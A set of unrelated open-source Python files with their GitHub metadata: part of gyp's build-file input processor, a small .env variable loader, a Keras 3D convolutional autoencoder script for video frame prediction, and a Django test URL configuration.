data = {'target_build_files': set()}
aux_data = {}
for build_file in build_files:
# Normalize paths everywhere. This is important because paths will be
# used as keys to the data dict and for references between input files.
build_file = os.path.normpath(build_file)
try:
LoadTargetBuildFile(build_file, data, aux_data, variables, includes,
depth, check)
except Exception, e:
gyp.common.ExceptionAppend(e, 'while trying to load %s' % build_file)
raise
# Build a dict to access each target's subdict by qualified name.
targets = BuildTargetsDict(data)
# Fully qualify all dependency links.
QualifyDependencies(targets)
# Expand dependencies specified as build_file:*.
ExpandWildcardDependencies(targets, data)
if circular_check:
# Make sure that any targets in a.gyp don't contain dependencies in other
# .gyp files that further depend on a.gyp.
VerifyNoGYPFileCircularDependencies(targets)
[dependency_nodes, flat_list] = BuildDependencyList(targets)
# Check that no two targets in the same directory have the same name.
VerifyNoCollidingTargets(flat_list)
# Handle dependent settings of various types.
for settings_type in ['all_dependent_settings',
'direct_dependent_settings',
'link_settings']:
DoDependentSettings(settings_type, flat_list, targets, dependency_nodes)
# Take out the dependent settings now that they've been published to all
# of the targets that require them.
for target in flat_list:
if settings_type in targets[target]:
del targets[target][settings_type]
# Make sure static libraries don't declare dependencies on other static
# libraries, but that linkables depend on all unlinked static libraries
# that they need so that their link steps will be correct.
AdjustStaticLibraryDependencies(flat_list, targets, dependency_nodes)
# Apply "post"/"late"/"target" variable expansions and condition evaluations.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ProcessVariablesAndConditionsInDict(target_dict, True, variables,
build_file)
# Move everything that can go into a "configurations" section into one.
for target in flat_list:
target_dict = targets[target]
SetUpConfigurations(target, target_dict)
# Apply exclude (!) and regex (/) list filters.
for target in flat_list:
target_dict = targets[target]
ProcessListFiltersInDict(target, target_dict)
# Make sure that the rules make sense, and build up rule_sources lists as
# needed. Not all generators will need to use the rule_sources lists, but
# some may, and it seems best to build the list in a common spot.
# Also validate actions and run_as elements in targets.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ValidateRulesInTarget(target, target_dict, extra_sources_for_rules)
ValidateRunAsInTarget(target, target_dict, build_file)
ValidateActionsInTarget(target, target_dict, build_file)
# Generators might not expect ints. Turn them into strs.
TurnIntIntoStrInDict(data)
# TODO(mark): Return |data| for now because the generator needs a list of
# build files that came in. In the future, maybe it should just accept
# a list, and not the whole data dict.
return [flat_list, targets, data]
| {
"content_hash": "5e3e702d963cc9fa1239bf6413dde5f2",
"timestamp": "",
"source": "github",
"line_count": 2244,
"max_line_length": 80,
"avg_line_length": 40.86096256684492,
"alnum_prop": 0.6521724905117131,
"repo_name": "leighpauls/k2cro4",
"id": "54e24665456c0fa5233edf5cc65cee4788b53fde",
"size": "91868",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "third_party/WebKit/Source/ThirdParty/gyp/pylib/gyp/input.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ASP",
"bytes": "3062"
},
{
"name": "AppleScript",
"bytes": "25392"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "68131038"
},
{
"name": "C",
"bytes": "242794338"
},
{
"name": "C#",
"bytes": "11024"
},
{
"name": "C++",
"bytes": "353525184"
},
{
"name": "Common Lisp",
"bytes": "3721"
},
{
"name": "D",
"bytes": "1931"
},
{
"name": "Emacs Lisp",
"bytes": "1639"
},
{
"name": "F#",
"bytes": "4992"
},
{
"name": "FORTRAN",
"bytes": "10404"
},
{
"name": "Java",
"bytes": "3845159"
},
{
"name": "JavaScript",
"bytes": "39146656"
},
{
"name": "Lua",
"bytes": "13768"
},
{
"name": "Matlab",
"bytes": "22373"
},
{
"name": "Objective-C",
"bytes": "21887598"
},
{
"name": "PHP",
"bytes": "2344144"
},
{
"name": "Perl",
"bytes": "49033099"
},
{
"name": "Prolog",
"bytes": "2926122"
},
{
"name": "Python",
"bytes": "39863959"
},
{
"name": "R",
"bytes": "262"
},
{
"name": "Racket",
"bytes": "359"
},
{
"name": "Ruby",
"bytes": "304063"
},
{
"name": "Scheme",
"bytes": "14853"
},
{
"name": "Shell",
"bytes": "9195117"
},
{
"name": "Tcl",
"bytes": "1919771"
},
{
"name": "Verilog",
"bytes": "3092"
},
{
"name": "Visual Basic",
"bytes": "1430"
},
{
"name": "eC",
"bytes": "5079"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os
import ast
__author__ = 'Matteo Danieli'
def load_env(print_vars=False):
"""Load environment variables from a .env file, if present.
If an .env file is found in the working directory, and the listed
environment variables are not already set, they will be set according to
the values listed in the file.
"""
env_file = os.environ.get('ENV_FILE', '.env')
try:
variables = open(env_file).read().splitlines()
for v in variables:
if '=' in v:
key, value = v.split('=', 1)
if key.startswith('#'):
continue
if key not in os.environ:
if value.startswith('"') and value.endswith('"') or \
value.startswith("'") and value.endswith("'"):
os.environ[key] = ast.literal_eval(value)
else:
os.environ[key] = value
if print_vars:
print(key, os.environ[key])
except IOError:
pass
| {
"content_hash": "1f3acfccbd6cef6fb62eb415207cb802",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 82,
"avg_line_length": 34.96875,
"alnum_prop": 0.516532618409294,
"repo_name": "BendingSpoons/envious",
"id": "a7fcd86659439a49467ed7f37c48d4001bfe1e39",
"size": "1119",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "envious/load.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5800"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hickle as hkl
import numpy as np
np.random.seed(2 ** 10)
from keras import backend as K
K.set_image_dim_ordering('tf')
from keras.layers import Dropout
from keras.models import Sequential
from keras.layers.core import Activation
from keras.utils.vis_utils import plot_model
from keras.layers.wrappers import TimeDistributed
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import Conv2DTranspose
from keras.layers.convolutional import Conv3D
from keras.layers.convolutional import Conv3DTranspose
from keras.layers.convolutional_recurrent import ConvLSTM2D
from keras.layers.normalization import BatchNormalization
from keras.callbacks import LearningRateScheduler
from keras.layers.advanced_activations import LeakyReLU
from keras.layers import Input
from keras.models import Model
from config_3d import *
import tb_callback
import lrs_callback
import argparse
import math
import os
import cv2
from sys import stdout
def encoder_model():
model = Sequential()
# 10x128x128
model.add(Conv3D(filters=128,
strides=(1, 4, 4),
kernel_size=(3, 11, 11),
padding='same',
input_shape=(int(VIDEO_LENGTH/2), 128, 128, 3)))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x32x32
model.add(Conv3D(filters=64,
strides=(1, 2, 2),
kernel_size=(3, 5, 5),
padding='same'))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
# 10x16x16
model.add(Conv3D(filters=32,
strides=(1, 1, 1),
kernel_size=(3, 5, 5),
padding='same'))
model.add(TimeDistributed(BatchNormalization()))
model.add(TimeDistributed(LeakyReLU(alpha=0.2)))
model.add(TimeDistributed(Dropout(0.5)))
return model
def decoder_model():
inputs = Input(shape=(10, 16, 16, 32))
# 10x32x32
conv_1 = Conv3DTranspose(filters=64,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 1, 1),
input_shape=(10, 16, 16, 32))(inputs)
x = TimeDistributed(BatchNormalization())(conv_1)
x = TimeDistributed(LeakyReLU(alpha=0.2))(x)
x = TimeDistributed(Dropout(0.5))(x)
# 10x64x64
conv_2 = Conv3DTranspose(filters=128,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 2, 2))(x)
x = TimeDistributed(BatchNormalization())(conv_2)
x = TimeDistributed(LeakyReLU(alpha=0.2))(x)
x = TimeDistributed(Dropout(0.5))(x)
# 10x64x64
conv_3 = Conv3DTranspose(filters=64,
kernel_size=(3, 5, 5),
padding='same',
strides=(1, 2, 2))(x)
x = TimeDistributed(BatchNormalization())(conv_3)
x = TimeDistributed(LeakyReLU(alpha=0.2))(x)
x = TimeDistributed(Dropout(0.5))(x)
# 10x128x128
conv_4 = Conv3DTranspose(filters=3,
kernel_size=(3, 11, 11),
strides=(1, 2, 2),
padding='same')(x)
x = TimeDistributed(BatchNormalization())(conv_4)
x = TimeDistributed(Activation('tanh'))(x)
predictions = TimeDistributed(Dropout(0.5))(x)
model = Model(inputs=inputs, outputs=predictions)
return model
def set_trainability(model, trainable):
model.trainable = trainable
for layer in model.layers:
layer.trainable = trainable
def autoencoder_model(encoder, decoder):
model = Sequential()
model.add(encoder)
model.add(decoder)
return model
def combine_images(X, y, generated_images):
# Unroll all generated video frames
n_frames = generated_images.shape[0] * generated_images.shape[1]
frames = np.zeros((n_frames,) + generated_images.shape[2:], dtype=generated_images.dtype)
frame_index = 0
for i in range(generated_images.shape[0]):
for j in range(generated_images.shape[1]):
frames[frame_index] = generated_images[i, j]
frame_index += 1
num = frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = frames.shape[1:]
image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=generated_images.dtype)
for index, img in enumerate(frames):
i = int(index / width)
j = index % width
image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
n_frames = X.shape[0] * X.shape[1]
orig_frames = np.zeros((n_frames,) + X.shape[2:], dtype=X.dtype)
# Original frames
frame_index = 0
for i in range(X.shape[0]):
for j in range(X.shape[1]):
orig_frames[frame_index] = X[i, j]
frame_index += 1
num = orig_frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = orig_frames.shape[1:]
orig_image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=X.dtype)
for index, img in enumerate(orig_frames):
i = int(index / width)
j = index % width
orig_image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
# Ground truth
truth_frames = np.zeros((n_frames,) + y.shape[2:], dtype=y.dtype)
frame_index = 0
for i in range(y.shape[0]):
for j in range(y.shape[1]):
truth_frames[frame_index] = y[i, j]
frame_index += 1
num = truth_frames.shape[0]
width = int(math.sqrt(num))
height = int(math.ceil(float(num) / width))
shape = truth_frames.shape[1:]
truth_image = np.zeros((height * shape[0], width * shape[1], shape[2]), dtype=y.dtype)
for index, img in enumerate(truth_frames):
i = int(index / width)
j = index % width
truth_image[i * shape[0]:(i + 1) * shape[0], j * shape[1]:(j + 1) * shape[1], :] = img
return orig_image, truth_image, image
def load_weights(weights_file, model):
model.load_weights(weights_file)
def run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS):
if PRINT_MODEL_SUMMARY:
print (encoder.summary())
print (decoder.summary())
print (autoencoder.summary())
# exit(0)
# Save model to file
if SAVE_MODEL:
print ("Saving models to file...")
model_json = encoder.to_json()
with open(os.path.join(MODEL_DIR, "encoder.json"), "w") as json_file:
json_file.write(model_json)
model_json = decoder.to_json()
with open(os.path.join(MODEL_DIR, "decoder.json"), "w") as json_file:
json_file.write(model_json)
model_json = autoencoder.to_json()
with open(os.path.join(MODEL_DIR, "autoencoder.json"), "w") as json_file:
json_file.write(model_json)
if PLOT_MODEL:
plot_model(encoder, to_file=os.path.join(MODEL_DIR, 'encoder.png'), show_shapes=True)
plot_model(decoder, to_file=os.path.join(MODEL_DIR, 'decoder.png'), show_shapes=True)
plot_model(autoencoder, to_file=os.path.join(MODEL_DIR, 'autoencoder.png'), show_shapes=True)
if ENC_WEIGHTS != "None":
print ("Pre-loading encoder with weights...")
load_weights(ENC_WEIGHTS, encoder)
if DEC_WEIGHTS != "None":
print ("Pre-loading decoder with weights...")
load_weights(DEC_WEIGHTS, decoder)
def load_X(videos_list, index, data_dir):
X = np.zeros((BATCH_SIZE, VIDEO_LENGTH,) + IMG_SIZE)
for i in range(BATCH_SIZE):
for j in range(VIDEO_LENGTH):
filename = "frame_" + str(videos_list[(index*BATCH_SIZE + i), j]) + ".png"
im_file = os.path.join(data_dir, filename)
try:
frame = cv2.imread(im_file, cv2.IMREAD_COLOR)
X[i, j] = (frame.astype(np.float32) - 127.5) / 127.5
except AttributeError as e:
print (im_file)
print (e)
return X
def train(BATCH_SIZE, ENC_WEIGHTS, DEC_WEIGHTS):
print ("Loading data...")
frames_source = hkl.load(os.path.join(DATA_DIR, 'sources_train_128.hkl'))
# Build video progressions
videos_list = []
start_frame_index = 1
end_frame_index = VIDEO_LENGTH + 1
while (end_frame_index <= len(frames_source)):
frame_list = frames_source[start_frame_index:end_frame_index]
if (len(set(frame_list)) == 1):
videos_list.append(range(start_frame_index, end_frame_index))
start_frame_index = start_frame_index + 1
end_frame_index = end_frame_index + 1
else:
start_frame_index = end_frame_index - 1
end_frame_index = start_frame_index + VIDEO_LENGTH
videos_list = np.asarray(videos_list, dtype=np.int32)
n_videos = videos_list.shape[0]
if SHUFFLE:
# Shuffle images to aid generalization
videos_list = np.random.permutation(videos_list)
# Build the Spatio-temporal Autoencoder
print ("Creating models...")
encoder = encoder_model()
decoder = decoder_model()
autoencoder = autoencoder_model(encoder, decoder)
run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS)
autoencoder.compile(loss='mean_squared_error', optimizer=OPTIM)
NB_ITERATIONS = int(n_videos/BATCH_SIZE)
# Setup TensorBoard Callback
TC = tb_callback.TensorBoard(log_dir=TF_LOG_DIR, histogram_freq=0, write_graph=False, write_images=False)
LRS = lrs_callback.LearningRateScheduler(schedule=schedule)
LRS.set_model(autoencoder)
print ("Beginning Training...")
# Begin Training
for epoch in range(NB_EPOCHS):
print("\n\nEpoch ", epoch)
loss = []
# Set learning rate every epoch
LRS.on_epoch_begin(epoch=epoch)
lr = K.get_value(autoencoder.optimizer.lr)
print ("Learning rate: " + str(lr))
for index in range(NB_ITERATIONS):
# Train Autoencoder
X = load_X(videos_list, index, DATA_DIR)
X_train = X[:, 0 : int(VIDEO_LENGTH/2)]
y_train = X[:, int(VIDEO_LENGTH/2) :]
loss.append(autoencoder.train_on_batch(X_train, y_train))
arrow = int(index / (NB_ITERATIONS / 40))
stdout.write("\rIteration: " + str(index) + "/" + str(NB_ITERATIONS-1) + " " +
"loss: " + str(loss[len(loss)-1]) +
"\t [" + "{0}>".format("="*(arrow)))
stdout.flush()
if SAVE_GENERATED_IMAGES:
# Save generated images to file
predicted_images = autoencoder.predict(X_train, verbose=0)
orig_image, truth_image, pred_image = combine_images(X_train, y_train, predicted_images)
pred_image = pred_image * 127.5 + 127.5
orig_image = orig_image * 127.5 + 127.5
truth_image = truth_image * 127.5 + 127.5
if epoch == 0 :
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + "_orig.png"), orig_image)
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + "_truth.png"), truth_image)
cv2.imwrite(os.path.join(GEN_IMAGES_DIR, str(epoch) + "_" + str(index) + ".png"), pred_image)
# then after each epoch/iteration
avg_loss = sum(loss)/len(loss)
logs = {'loss': avg_loss}
TC.on_epoch_end(epoch, logs)
# Log the losses
with open(os.path.join(LOG_DIR, 'losses.json'), 'a') as log_file:
log_file.write("{\"epoch\":%d, \"d_loss\":%f};\n" % (epoch, avg_loss))
print("\nAvg loss: " + str(avg_loss))
# Save model weights per epoch to file
encoder.save_weights(os.path.join(CHECKPOINT_DIR, 'encoder_epoch_'+str(epoch)+'.h5'), True)
decoder.save_weights(os.path.join(CHECKPOINT_DIR, 'decoder_epoch_' + str(epoch) + '.h5'), True)
# End TensorBoard Callback
TC.on_train_end('_')
def test(ENC_WEIGHTS, DEC_WEIGHTS):
# Create models
print ("Creating models...")
encoder = encoder_model()
decoder = decoder_model()
autoencoder = autoencoder_model(encoder, decoder)
run_utilities(encoder, decoder, autoencoder, ENC_WEIGHTS, DEC_WEIGHTS)
autoencoder.compile(loss='mean_squared_error', optimizer=OPTIM)
# Build video progressions
frames_source = hkl.load(os.path.join(TEST_DATA_DIR, 'sources_test_128.hkl'))
videos_list = []
start_frame_index = 1
end_frame_index = VIDEO_LENGTH + 1
while (end_frame_index <= len(frames_source)):
frame_list = frames_source[start_frame_index:end_frame_index]
if (len(set(frame_list)) == 1):
videos_list.append(range(start_frame_index, end_frame_index))
start_frame_index = start_frame_index + VIDEO_LENGTH
end_frame_index = end_frame_index + VIDEO_LENGTH
else:
start_frame_index = end_frame_index - 1
end_frame_index = start_frame_index + VIDEO_LENGTH
videos_list = np.asarray(videos_list, dtype=np.int32)
n_videos = videos_list.shape[0]
# Test model by making predictions
loss = []
NB_ITERATIONS = int(n_videos / BATCH_SIZE)
for index in range(NB_ITERATIONS):
# Test Autoencoder
X = load_X(videos_list, index, TEST_DATA_DIR)
X_test = X[:, 0: int(VIDEO_LENGTH / 2)]
y_test = X[:, int(VIDEO_LENGTH / 2):]
loss.append(autoencoder.test_on_batch(X_test, y_test))
y_pred = autoencoder.predict_on_batch(X_test)
arrow = int(index / (NB_ITERATIONS / 40))
stdout.write("\rIteration: " + str(index) + "/" + str(NB_ITERATIONS - 1) + " " +
"loss: " + str(loss[len(loss) - 1]) +
"\t [" + "{0}>".format("=" * (arrow)))
stdout.flush()
orig_image, truth_image, pred_image = combine_images(X_test, y_test, y_pred)
pred_image = pred_image * 127.5 + 127.5
orig_image = orig_image * 127.5 + 127.5
truth_image = truth_image * 127.5 + 127.5
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_orig.png"), orig_image)
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_truth.png"), truth_image)
cv2.imwrite(os.path.join(TEST_RESULTS_DIR, str(index) + "_pred.png"), pred_image)
avg_loss = sum(loss) / len(loss)
print("\nAvg loss: " + str(avg_loss))
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--mode", type=str)
parser.add_argument("--enc_weights", type=str, default="None")
parser.add_argument("--dec_weights", type=str, default="None")
parser.add_argument("--batch_size", type=int, default=BATCH_SIZE)
parser.add_argument("--nice", dest="nice", action="store_true")
parser.set_defaults(nice=False)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = get_args()
if args.mode == "train":
train(BATCH_SIZE=args.batch_size,
ENC_WEIGHTS=args.enc_weights,
DEC_WEIGHTS=args.dec_weights)
if args.mode == "test":
test(ENC_WEIGHTS=args.enc_weights,
DEC_WEIGHTS=args.dec_weights) | {
"content_hash": "e323da0d8dc0ca0575f0bc2eea884695",
"timestamp": "",
"source": "github",
"line_count": 424,
"max_line_length": 116,
"avg_line_length": 36.839622641509436,
"alnum_prop": 0.5980153649167733,
"repo_name": "pratikgujjar/DeepIntent",
"id": "bf3143ddd689358b48768af40f30084525c54f98",
"size": "15620",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/autoencoder_model/scripts/3D_autoencoder.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "317224"
},
{
"name": "Shell",
"bytes": "1059"
}
],
"symlink_target": ""
} |
from django.urls import re_path
from . import views
urlpatterns = [
re_path(r'extra_2/$', views.extra_view, {'message': 'test included urlconf'}, name='extra_second'),
]
| {
"content_hash": "1fac50a4165192d00f1594ab548bae3a",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 103,
"avg_line_length": 25.142857142857142,
"alnum_prop": 0.6818181818181818,
"repo_name": "rsalmaso/django-cms",
"id": "bae71666ba174d0de323970e75de903892bce39a",
"size": "176",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "cms/test_utils/project/sampleapp/urls_extra.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "204223"
},
{
"name": "JavaScript",
"bytes": "1250281"
},
{
"name": "Python",
"bytes": "2386268"
},
{
"name": "SCSS",
"bytes": "137693"
},
{
"name": "Shell",
"bytes": "22511"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.